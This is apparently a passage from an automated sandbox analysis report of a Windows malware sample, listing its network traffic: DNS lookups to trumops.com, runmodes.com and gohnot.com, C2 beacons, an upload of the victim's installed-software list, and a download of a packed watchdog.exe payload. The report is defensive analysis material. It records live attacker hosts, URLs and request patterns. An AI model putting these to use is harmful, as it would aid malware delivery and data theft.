Nov 11, 2021 01:57:26.224853039 CET	443	49748	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:29.804554939 CET	49749	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:29.804609060 CET	443	49749	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:29.804697990 CET	49749	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:29.806359053 CET	49749	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:29.806390047 CET	443	49749	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:29.844959974 CET	443	49749	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:29.845187902 CET	49749	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:29.845227957 CET	443	49749	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:29.845765114 CET	49749	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:29.845777988 CET	443	49749	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:29.848901033 CET	443	49749	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:29.848999977 CET	49749	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:29.850955009 CET	49749	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:29.851120949 CET	443	49749	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:29.851155043 CET	49749	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:29.891774893 CET	443	49749	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:29.892015934 CET	49749	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:29.892066002 CET	49749	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:29.892090082 CET	443	49749	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:29.892103910 CET	49749	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:29.892116070 CET	443	49749	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:31.124598026 CET	49750	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:31.124660015 CET	443	49750	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:31.124742031 CET	49750	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:31.127474070 CET	49750	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:31.127504110 CET	443	49750	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:31.166868925 CET	443	49750	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:31.167211056 CET	49750	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:31.167254925 CET	443	49750	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:31.167835951 CET	49750	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:31.167854071 CET	443	49750	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:31.170991898 CET	443	49750	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:31.171071053 CET	49750	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:31.173746109 CET	49750	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:31.173870087 CET	443	49750	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:31.174062014 CET	49750	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:31.174091101 CET	443	49750	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:31.232697964 CET	443	49750	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:31.232809067 CET	49750	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:31.238821983 CET	49750	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:31.238851070 CET	443	49750	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:45.430028915 CET	49751	443	192.168.2.3	172.67.139.144
Nov 11, 2021 01:57:45.430084944 CET	443	49751	172.67.139.144	192.168.2.3
Nov 11, 2021 01:57:45.430182934 CET	49751	443	192.168.2.3	172.67.139.144

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 11, 2021 01:57:25.558749914 CET	57459	53	192.168.2.3	8.8.8.8
Nov 11, 2021 01:57:25.580398083 CET	53	57459	8.8.8.8	192.168.2.3
Nov 11, 2021 01:57:25.601104021 CET	57875	53	192.168.2.3	8.8.8.8
Nov 11, 2021 01:57:25.622384071 CET	53	57875	8.8.8.8	192.168.2.3
Nov 11, 2021 01:57:25.633168936 CET	54154	53	192.168.2.3	8.8.8.8
Nov 11, 2021 01:57:25.654891014 CET	53	54154	8.8.8.8	192.168.2.3
Nov 11, 2021 01:57:25.798604012 CET	52806	53	192.168.2.3	8.8.8.8
Nov 11, 2021 01:57:25.819714069 CET	53	52806	8.8.8.8	192.168.2.3
Nov 11, 2021 01:57:25.941287041 CET	53910	53	192.168.2.3	8.8.8.8
Nov 11, 2021 01:57:25.962297916 CET	53	53910	8.8.8.8	192.168.2.3
Nov 11, 2021 01:57:29.762208939 CET	64021	53	192.168.2.3	8.8.8.8
Nov 11, 2021 01:57:29.781250954 CET	53	64021	8.8.8.8	192.168.2.3
Nov 11, 2021 01:57:31.092811108 CET	60784	53	192.168.2.3	8.8.8.8
Nov 11, 2021 01:57:31.111459970 CET	53	60784	8.8.8.8	192.168.2.3
Nov 11, 2021 01:57:45.395169020 CET	51143	53	192.168.2.3	8.8.8.8
Nov 11, 2021 01:57:45.415052891 CET	53	51143	8.8.8.8	192.168.2.3
Nov 11, 2021 01:57:46.263003111 CET	56009	53	192.168.2.3	8.8.8.8
Nov 11, 2021 01:57:46.282412052 CET	53	56009	8.8.8.8	192.168.2.3
Nov 11, 2021 01:57:52.263390064 CET	49572	53	192.168.2.3	8.8.8.8
Nov 11, 2021 01:57:52.282677889 CET	53	49572	8.8.8.8	192.168.2.3
Nov 11, 2021 01:57:55.960362911 CET	60823	53	192.168.2.3	8.8.8.8
Nov 11, 2021 01:57:55.981394053 CET	53	60823	8.8.8.8	192.168.2.3
Nov 11, 2021 01:58:41.725279093 CET	53777	53	192.168.2.3	8.8.8.8
Nov 11, 2021 01:58:41.744313002 CET	53	53777	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 11, 2021 01:57:25.558749914 CET	192.168.2.3	8.8.8.8	0x65fe	Standard query (0)	trumops.com	16	IN (0x0001)
Nov 11, 2021 01:57:25.601104021 CET	192.168.2.3	8.8.8.8	0x1f10	Standard query (0)	logs.trumops.com	16	IN (0x0001)
Nov 11, 2021 01:57:25.633168936 CET	192.168.2.3	8.8.8.8	0xc9fd	Standard query (0)	f7873597-7b36-4441-9416-097456f134ae.uuid.trumops.com	16	IN (0x0001)
Nov 11, 2021 01:57:25.798604012 CET	192.168.2.3	8.8.8.8	0x4e67	Standard query (0)	runmodes.com	A (IP address)	IN (0x0001)
Nov 11, 2021 01:57:25.941287041 CET	192.168.2.3	8.8.8.8	0x4744	Standard query (0)	server8.trumops.com	A (IP address)	IN (0x0001)
Nov 11, 2021 01:57:29.762208939 CET	192.168.2.3	8.8.8.8	0x2cd1	Standard query (0)	runmodes.com	A (IP address)	IN (0x0001)
Nov 11, 2021 01:57:31.092811108 CET	192.168.2.3	8.8.8.8	0x443e	Standard query (0)	server8.trumops.com	A (IP address)	IN (0x0001)
Nov 11, 2021 01:57:45.395169020 CET	192.168.2.3	8.8.8.8	0x7046	Standard query (0)	server8.trumops.com	A (IP address)	IN (0x0001)
Nov 11, 2021 01:57:46.263003111 CET	192.168.2.3	8.8.8.8	0x6c70	Standard query (0)	gohnot.com	A (IP address)	IN (0x0001)
Nov 11, 2021 01:57:52.263390064 CET	192.168.2.3	8.8.8.8	0x3cee	Standard query (0)	e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com	16	IN (0x0001)
Nov 11, 2021 01:57:55.960362911 CET	192.168.2.3	8.8.8.8	0x96aa	Standard query (0)	runmodes.com	A (IP address)	IN (0x0001)
Nov 11, 2021 01:58:41.725279093 CET	192.168.2.3	8.8.8.8	0x97ce	Standard query (0)	server8.trumops.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 11, 2021 01:57:25.580398083 CET	8.8.8.8	192.168.2.3	0x65fe	No error (0)	trumops.com			TXT (Text strings)	IN (0x0001)
Nov 11, 2021 01:57:25.622384071 CET	8.8.8.8	192.168.2.3	0x1f10	No error (0)	logs.trumops.com			TXT (Text strings)	IN (0x0001)
Nov 11, 2021 01:57:25.654891014 CET	8.8.8.8	192.168.2.3	0xc9fd	Name error (3)	f7873597-7b36-4441-9416-097456f134ae.uuid.trumops.com	none	none	16	IN (0x0001)
Nov 11, 2021 01:57:25.819714069 CET	8.8.8.8	192.168.2.3	0x4e67	No error (0)	runmodes.com		104.21.34.203	A (IP address)	IN (0x0001)
Nov 11, 2021 01:57:25.819714069 CET	8.8.8.8	192.168.2.3	0x4e67	No error (0)	runmodes.com		172.67.207.136	A (IP address)	IN (0x0001)
Nov 11, 2021 01:57:25.962297916 CET	8.8.8.8	192.168.2.3	0x4744	No error (0)	server8.trumops.com		104.21.79.9	A (IP address)	IN (0x0001)
Nov 11, 2021 01:57:25.962297916 CET	8.8.8.8	192.168.2.3	0x4744	No error (0)	server8.trumops.com		172.67.139.144	A (IP address)	IN (0x0001)
Nov 11, 2021 01:57:29.781250954 CET	8.8.8.8	192.168.2.3	0x2cd1	No error (0)	runmodes.com		104.21.34.203	A (IP address)	IN (0x0001)
Nov 11, 2021 01:57:29.781250954 CET	8.8.8.8	192.168.2.3	0x2cd1	No error (0)	runmodes.com		172.67.207.136	A (IP address)	IN (0x0001)
Nov 11, 2021 01:57:31.111459970 CET	8.8.8.8	192.168.2.3	0x443e	No error (0)	server8.trumops.com		104.21.79.9	A (IP address)	IN (0x0001)
Nov 11, 2021 01:57:31.111459970 CET	8.8.8.8	192.168.2.3	0x443e	No error (0)	server8.trumops.com		172.67.139.144	A (IP address)	IN (0x0001)
Nov 11, 2021 01:57:45.415052891 CET	8.8.8.8	192.168.2.3	0x7046	No error (0)	server8.trumops.com		172.67.139.144	A (IP address)	IN (0x0001)
Nov 11, 2021 01:57:45.415052891 CET	8.8.8.8	192.168.2.3	0x7046	No error (0)	server8.trumops.com		104.21.79.9	A (IP address)	IN (0x0001)
Nov 11, 2021 01:57:46.282412052 CET	8.8.8.8	192.168.2.3	0x6c70	No error (0)	gohnot.com		172.67.196.11	A (IP address)	IN (0x0001)
Nov 11, 2021 01:57:46.282412052 CET	8.8.8.8	192.168.2.3	0x6c70	No error (0)	gohnot.com		104.21.92.165	A (IP address)	IN (0x0001)
Nov 11, 2021 01:57:52.282677889 CET	8.8.8.8	192.168.2.3	0x3cee	No error (0)	e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com			TXT (Text strings)	IN (0x0001)
Nov 11, 2021 01:57:55.981394053 CET	8.8.8.8	192.168.2.3	0x96aa	No error (0)	runmodes.com		172.67.207.136	A (IP address)	IN (0x0001)
Nov 11, 2021 01:57:55.981394053 CET	8.8.8.8	192.168.2.3	0x96aa	No error (0)	runmodes.com		104.21.34.203	A (IP address)	IN (0x0001)
Nov 11, 2021 01:58:41.744313002 CET	8.8.8.8	192.168.2.3	0x97ce	No error (0)	server8.trumops.com		172.67.139.144	A (IP address)	IN (0x0001)
Nov 11, 2021 01:58:41.744313002 CET	8.8.8.8	192.168.2.3	0x97ce	No error (0)	server8.trumops.com		104.21.79.9	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

runmodes.com

server8.trumops.com

gohnot.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49747	104.21.34.203	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49748	104.21.79.9	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49749	104.21.34.203	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49750	104.21.79.9	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49751	172.67.139.144	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49754	172.67.207.136	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49808	172.67.139.144	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49752	172.67.196.11	80	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data
Nov 11, 2021 01:57:46.367980957 CET	1050	OUT	GET /61c75dbee3f325b4d87cddaf5bae3393/watchdog.exe HTTP/1.1 Host: gohnot.com User-Agent: Go-http-client/1.1 Uuid: f7873597-7b36-4441-9416-097456f134ae Version: 183 Accept-Encoding: gzip
Nov 11, 2021 01:57:46.396821022 CET	1051	IN	HTTP/1.1 200 OK Date: Thu, 11 Nov 2021 00:57:46 GMT Content-Type: application/octet-stream Content-Length: 2102272 Connection: keep-alive content-disposition: attachment; filename=watchdog.exe etag: "616ea494-201400" last-modified: Tue, 19 Oct 2021 10:57:24 GMT Cache-Control: max-age=3600 CF-Cache-Status: HIT Age: 3465 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mUdca%2FhPVx%2BcuIN0mD4co%2Fq%2B%2FeXbPU6Zq0S%2FW1p4uyl4SjDH8JZzFzI5IDyMwm0EeLJ8hLsHyRpILoj74RMKgCuPLLbsz17avF1sdGfbIzhrwOIhomElDn412zdD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 6ac39180d8125c92-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 b4 4b 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 10 20 00 00 10 00 00 00 70 2d 00 00 8d 4d 00 00 80 2d 00 00 90 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 4d 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 4d 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 70 2d 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 20 00 00 80 2d 00 00 10 20 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 90 4d 00 00 02 00 00 00 12 20 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49747	104.21.34.203	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-11 00:57:26 UTC	0	OUT	POST /api/log HTTP/1.1 Host: runmodes.com User-Agent: Go-http-client/1.1 Content-Length: 144 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip
2021-11-11 00:57:26 UTC	0	OUT	Data Raw: 71 4f 59 76 58 43 58 54 43 37 6d 79 4a 47 49 73 30 35 78 7a 68 45 65 72 32 54 4d 65 38 6e 37 47 6e 6a 61 44 42 58 36 6f 4b 5a 33 2b 46 61 2f 43 44 4f 30 6e 4c 65 6e 34 6f 4e 4b 69 51 78 47 62 65 32 42 4e 6a 32 6f 32 32 78 52 46 43 4a 55 79 6a 49 2b 55 32 6d 58 7a 76 59 46 71 66 32 65 79 4a 55 51 62 6a 48 68 44 37 38 4c 37 75 2f 45 77 33 44 33 70 75 43 5a 63 37 30 4c 64 6a 56 55 45 56 48 2f 70 41 5a 5a 65 6b 47 4c 65 78 39 58 34 Data Ascii: qOYvXCXTC7myJGIs05xzhEer2TMe8n7GnjaDBX6oKZ3+Fa/CDO0nLen4oNKiQxGbe2BNj2o22xRFCJUyjI+U2mXzvYFqf2eyJUQbjHhD78L7u/Ew3D3puCZc70LdjVUEVH/pAZZekGLex9X4
2021-11-11 00:57:26 UTC	12	IN	HTTP/1.1 200 OK Date: Thu, 11 Nov 2021 00:57:26 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o15Uarx556ixdHy7oRivRosYtXYjyRifqqP6t1%2BtmZOXZAbOiahwkZVvykPAvESOkuK0O8hYCBqo0339em9U6tDCFHqM8DNcA0ItsELxFNpS7RGTg4CSkl20kQlKzmI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6ac391019eea699b-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49748	104.21.79.9	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-11 00:57:26 UTC	0	OUT	POST /bots/post-ia-data?uuid=f7873597-7b36-4441-9416-097456f134ae HTTP/1.1 Host: server8.trumops.com User-Agent: Go-http-client/1.1 Content-Length: 18950 Content-Type: application/json; charset=UTF-8 Accept-Encoding: gzip
2021-11-11 00:57:26 UTC	0	OUT	Data Raw: 5b 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 38 34 31 34 35 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 33 31 34 31 34 35 36 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: [{"display_name":"Update for Microsoft Office 2016 (KB4484145) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB3141456) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"U
2021-11-11 00:57:26 UTC	1	OUT	Data Raw: 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 20 66 6f 72 20 42 75 73 69 6e 65 73 73 20 28 4b 42 34 30 32 32 32 31 39 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 43 6f 6e 6e 65 63 74 69 6f 6e 20 4d 61 6e 61 67 65 72 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 57 Data Ascii: },{"display_name":"Update for Microsoft OneDrive for Business (KB4022219) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Connection Manager","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft W
2021-11-11 00:57:26 UTC	3	OUT	Data Raw: 2e 33 30 35 30 31 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 32 2e 30 2e 33 30 35 30 31 2e 30 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 50 72 6f 6a 65 63 74 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 36 39 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 37 Data Ascii: .30501","display_version":"12.0.30501.0","install_date":""},{"display_name":"Security Update for Microsoft Project 2016 (KB4484269) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Excel 2016 (KB448427
2021-11-11 00:57:26 UTC	4	OUT	Data Raw: 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 37 35 35 38 38 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 36 31 34 33 35 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c Data Ascii: ersion":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB4475588) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB4461435) 32-Bit Edition","display_version":"","install
2021-11-11 00:57:26 UTC	8	OUT	Data Raw: 5f 76 65 72 73 69 6f 6e 22 3a 22 31 36 2e 30 2e 34 32 36 36 2e 31 30 30 31 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 32 30 30 37 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 33 31 31 38 32 36 33 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 50 72 6f 6a 65 63 74 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 36 39 29 20 33 32 2d 42 69 74 20 45 64 69 74 Data Ascii: _version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"Update for Microsoft Office 2016 (KB3118263) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Project 2016 (KB4484269) 32-Bit Edit
2021-11-11 00:57:26 UTC	12	OUT	Data Raw: 32 31 30 30 35 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 31 39 30 36 32 37 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 4f 53 4d 20 55 58 20 4d 55 49 20 28 45 6e 67 6c 69 73 68 29 20 32 30 31 36 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 36 2e 30 2e 34 32 36 36 2e 31 30 30 31 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 32 30 30 37 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 32 30 31 36 20 28 4b 42 34 34 38 34 33 30 30 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 Data Ascii: 21005","install_date":"20190627"},{"display_name":"Microsoft Office OSM UX MUI (English) 2016","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"Security Update for Microsoft Word 2016 (KB4484300) 32-Bit Edition","display_vers
2021-11-11 00:57:26 UTC	16	OUT	Data Raw: 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 38 37 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 38 34 31 30 36 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 Data Ascii: :""},{"display_name":"Security Update for Microsoft Office 2016 (KB4484287) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB4484106) 32-Bit Edition","display_version":"","install_date":""},{"dis
